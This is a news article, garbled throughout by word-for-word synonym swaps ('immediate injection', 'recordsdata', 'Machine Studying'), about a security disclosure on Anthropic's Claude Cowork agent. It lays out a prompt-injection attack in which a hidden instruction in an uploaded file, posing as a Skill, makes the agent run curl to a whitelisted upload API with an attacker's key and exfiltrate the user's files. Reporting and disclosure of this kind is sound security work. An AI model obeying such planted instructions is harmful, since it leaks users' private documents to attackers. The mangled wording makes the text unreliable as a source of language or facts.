Agentic AI
,
Synthetic Intelligence & Machine Studying
,
Subsequent-Technology Applied sciences & Safe Growth
AI Agent Can Entry File Add API to Exfiltrate Paperwork

Safety researchers have demonstrated how Anthropic’s new Claude Cowork productiveness agent could be tricked into stealing person recordsdata and importing them to an attacker’s account, exploiting a vulnerability the corporate allegedly knew about however left unpatched for 3 months.
See Additionally: Proof of Idea: Bot or Purchaser? Id Disaster in Retail
The vulnerability permits attackers to manipulate Cowork via immediate injection into importing person recordsdata to an attacker’s Anthropic account, with out requiring any further approval from the sufferer. Safety agency PromptArmor printed a proof of idea, exhibiting how the assault works in opposition to the synthetic intelligence agent.
The assault chain begins when a person connects Cowork to a neighborhood folder containing delicate data. The person uploads a doc that incorporates a hidden immediate injection. When Cowork analyzes the recordsdata, the injected immediate triggers routinely. PromptArmor demonstrated this utilizing a situation wherein the malicious doc posed as a Claude Ability, a kind of instruction file customers can add to increase the AI’s capabilities.
The injection instructs Claude to execute a curl command to Anthropic’s file add API utilizing the attacker’s API key, moderately than the sufferer’s. Code executed by Claude runs in a digital machine that restricts outbound community requests to virtually all domains, however the Anthropic API is whitelisted as trusted, permitting the assault to succeed.
The vulnerability impacts Claude Haiku and the corporate’s flagship mannequin Claude Opus 4.5. PromptArmor demonstrated knowledge exfiltration from Opus 4.5 when a simulated person uploaded a malicious integration information whereas creating a brand new AI software. The agency stated that immediate injection exploits architectural vulnerabilities moderately than mannequin intelligence gaps, that means that reasoning offers no protection.
Safety researcher Johann Rehberger first disclosed the Information API exfiltration vulnerability to Anthropic through HackerOne in October 2025. He stated Anthropic allegedly closed the bug report an hour later, dismissing the problem as out of scope and classifying it as a mannequin security concern, moderately than a safety vulnerability.
Rehberger stated Anthropic once more contacted him that month to say that knowledge exfiltration vulnerabilities are in scope for reporting. However, he stated, the corporate didn’t implement a repair. When Cowork launched on Jan. 13, almost three months after the preliminary disclosure, the API was nonetheless susceptible.
To mitigate the dangers, Anthropic suggested Cowork customers to keep away from connecting the software to delicate paperwork, restrict its Chrome extension to trusted websites and monitor for suspicious actions that will point out immediate injection. Developer Simon Willison, who reviewed Cowork, questioned the corporate’s method. “I don’t assume it’s truthful to inform common non-programmer customers to be careful for ‘suspicious actions that will point out immediate injection,'” Willison stated.
Anthropic stated that Cowork was launched as a analysis preview with distinctive dangers as a result of its agentic nature and web entry. It plans to ship an replace to the Cowork digital machine to enhance its interplay with the susceptible API and that different safety enhancements will comply with.
PromptArmor researchers additionally found that Claude’s API struggles when a file doesn’t match the sort it claims to be. When working on a malformed PDF that’s really a textual content file, Claude throws API errors in each subsequent chat within the dialog. Researchers stated this failure might doubtlessly be exploited via oblique immediate injection to trigger a restricted denial of service assault.
The broader implications of the vulnerability prolong past file exfiltration. Cowork was designed to work together with a person’s whole work surroundings, together with browsers and mannequin context protocol servers that grant capabilities reminiscent of sending texts or controlling a Mac with AppleScripts. These capabilities improve the chance that the mannequin will course of delicate and untrusted knowledge sources that customers don’t manually overview for injections, creating what PromptArmor describes as an ever-growing assault floor.









